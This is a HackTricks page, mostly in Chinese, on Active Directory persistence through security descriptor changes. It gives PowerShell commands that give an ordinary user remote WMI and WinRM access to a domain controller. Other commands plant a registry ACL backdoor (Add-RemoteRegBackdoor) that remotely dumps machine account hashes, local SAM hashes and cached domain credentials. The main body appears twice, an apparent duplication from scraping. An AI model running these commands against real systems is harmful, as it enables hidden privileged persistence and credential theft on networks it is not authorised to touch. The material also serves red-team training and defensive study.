Security Descriptors

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Security Descriptors

来自文档：安全描述符定义语言（SDDL）定义了用于描述安全描述符的格式。SDDL使用ACE字符串用于DACL和SACL：ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

安全描述符用于存储一个对象对另一个对象的权限。如果您只需在对象的安全描述符中进行一点更改，就可以在不需要成为特权组成员的情况下获得对该对象的非常有趣的权限。

因此，这种持久性技术基于获得对某些对象所需的每个权限的能力，以便能够执行通常需要管理员权限的任务，但无需成为管理员。

Access to WMI

您可以通过使用这个来给用户访问远程执行WMI的权限：

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

给用户winrm PS 控制台的访问权限 使用这个:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

远程访问哈希

访问注册表并转储哈希，创建一个Reg 后门使用 DAMP，这样你可以在任何时候检索计算机的哈希、SAM和计算机中的任何缓存的 AD凭据。因此，将此权限授予普通用户对域控制器计算机非常有用：

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

检查 Silver Tickets 以了解如何使用域控制器计算机帐户的哈希。

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousResource-based Constrained Delegation NextSID-History Injection

Last updated 4 months ago

Security Descriptors

因此，这种持久性技术基于获得对某些对象所需的每个权限的能力，以便能够执行通常需要管理员权限的任务，但无需成为管理员。

Access to WMI

您可以通过使用这个来给用户访问远程执行WMI的权限：

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

给用户winrm PS 控制台的访问权限 使用这个:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

远程访问哈希

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

检查 Silver Tickets 以了解如何使用域控制器计算机帐户的哈希。